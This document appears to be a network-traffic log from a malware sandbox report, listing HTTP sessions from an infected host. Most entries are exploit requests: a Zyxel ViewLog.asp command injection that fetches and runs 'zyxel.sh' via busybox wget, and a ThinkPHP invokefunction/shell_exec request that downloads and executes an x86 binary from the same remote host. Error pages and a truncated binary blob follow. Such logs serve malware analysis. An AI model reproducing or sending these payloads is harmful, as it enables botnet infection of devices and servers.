                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5192.168.2.143897294.187.112.478080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:44.072396040 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6192.168.2.145426695.215.160.1258080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:44.104789972 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7192.168.2.143920831.136.96.218080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:44.439240932 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:32:45.065874100 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:32:46.313909054 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:32:48.873718977 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:32:53.993509054 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:03.977092981 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:25.480328083 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:06.438584089 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8192.168.2.145022431.136.68.2068080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:44.506689072 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:32:45.129861116 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:32:46.377881050 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:32:48.873708010 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:32:53.993503094 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:03.977092028 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:25.480330944 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:06.438563108 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9192.168.2.145651094.123.56.178080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:44.552011967 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10192.168.2.144222888.221.135.3380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:45.002998114 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:32:45.196113110 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:32:45 GMT
                                                        Date: Wed, 14 Feb 2024 08:32:45 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 30 33 36 37 61 35 63 26 23 34 36 3b 31 37 30 37 38 39 39 35 36 35 26 23 34 36 3b 33 30 62 31 32 31 37 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;40367a5c&#46;1707899565&#46;30b12173</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11192.168.2.144301088.221.195.19780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:45.008596897 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12192.168.2.144832088.98.24.22780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:45.009996891 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:32:45.217749119 CET1286INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:32:45 GMT
                                                        Server: Apache
                                                        Upgrade: h2,h2c
                                                        Connection: Upgrade, close
                                                        Accept-Ranges: bytes
                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: 0
                                                        Content-Type: text/html
                                                        Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 37 66 37 66 37 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 38 30 38 30 38 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 38 30 38 30 38 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20
                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #f7f7f7; color: #808080; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #808080; } .status-code { font-size: 500%; }
                                                        Feb 14, 2024 09:32:45.217791080 CET1286INData Raw: 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20
                                                        Data Ascii: .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background: linear-gradient(-
                                                        Feb 14, 2024 09:32:45.217828989 CET1286INData Raw: 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b
                                                        Data Ascii: .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer {
                                                        Feb 14, 2024 09:32:45.217866898 CET1286INData Raw: 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76
                                                        Data Ascii: ding { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom: 0; margin: 0
                                                        Feb 14, 2024 09:32:45.217922926 CET1286INData Raw: 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 6f 6a 57 64 49 67 50 66 66 37 59 69 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66 44 6a 31 78 64 65 76 4e 6e 62 55 33 56 46 66 54 45 4c 2f
                                                        Data Ascii: LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQH
                                                        Feb 14, 2024 09:32:45.217958927 CET1286INData Raw: 51 52 43 41 38 49 77 54 52 41 57 31 4f 37 50 41 73 62 74 43 50 79 4d 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52 7a 72 46 74 74 70 68 55 52 2b 4d 76 45 50 53 78 2b 36 6d 2f 70 43 78 45 69 33 59 37 70 34 38 35 45 53 41 56 6d 75 6c 64 76 7a 53 54 4b
